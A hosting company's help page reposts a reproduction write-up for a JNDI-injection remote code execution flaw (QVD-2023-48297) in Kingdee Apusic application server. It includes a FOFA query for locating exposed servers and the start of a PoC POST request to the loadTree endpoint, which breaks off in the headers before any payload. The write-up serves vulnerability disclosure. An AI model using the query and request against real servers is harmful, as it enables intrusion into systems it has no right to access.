帮助文档
专业提供香港服务器、香港云服务器、香港高防服务器租用、香港云主机、台湾服务器、美国服务器、美国云服务器vps租用、韩国高防服务器租用、新加坡服务器、日本服务器租用 一站式全球网络解决方案提供商!专业运营维护IDC数据中心,提供高质量的服务器托管,服务器机房租用,服务器机柜租用,IDC机房机柜租用等服务,稳定、安全、高性能的云端计算服务,实时满足您的多样性业务需求。 香港大带宽稳定可靠,高级工程师提供基于服务器硬件、操作系统、网络、应用环境、安全的免费技术支持。
服务器资讯 / 香港服务器租用 / 香港VPS租用 / 香港云服务器 / 美国服务器租用 / 台湾服务器租用 / 日本服务器租用 / 官方公告 / 帮助文档
金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297)
发布时间:2024-03-08 04:38:10   分类:帮助文档
金蝶Apusic应用服务器 loadTree JNDI注入漏洞复现(QVD-2023-48297) 0x01 产品简介 金蝶Apusic应用服务器是一款企业级应用服务器,支持Java EE技术,适用于各种商业环境。 0x02 漏洞概述 由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向loadTree接口执行JNDI注入,造成远程代码执行漏洞。利用该漏洞需低版本JDK。(漏洞比较旧,8月份补丁已出,金蝶EAS也存在类似漏洞,只是路径不一样) 0x03 影响范围 影响版本 金蝶Apusic应用服务器 <= V9.0 SP7 不受影响版本 金蝶Apusic应用服务器 > V9.0 SP7 0x04 复现环境 FOFA:app="Apusic应用服务器" 0x05 漏洞复现 PoC POST /admin//protect/jndi/loadTree HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh
香港云服务器租用推荐
服务器租用资讯
·主机测评:如何选择最合适的主机服务
·中文域名的ping操作详解,推荐2025年使用最新工具进行解析
·只有域名怎么备案,如何在没有服务器的情况下完成备案呢?只需向服务商提交信息就能开启备案流程。
·怎么转发网址:哪里有教你如何操作网址转发的方法?
·怎么选择php版本:最全面的PHP版本选择指南与实用建议
·怎么申请com域名?只需了解关键步骤,让你轻松注册理想域名。
·怎么购买IP地址?购买IP地址的步骤与注意事项详解及推荐的服务提供商介绍
·怎么防御流量攻击:哪里有有效的应对策略?
·怎么查域名dns:如何获取和解析DNS记录
服务器租用推荐
·美国服务器租用
·台湾服务器租用
·香港云服务器租用
·香港裸金属服务器
·香港高防服务器租用
·香港服务器租用特价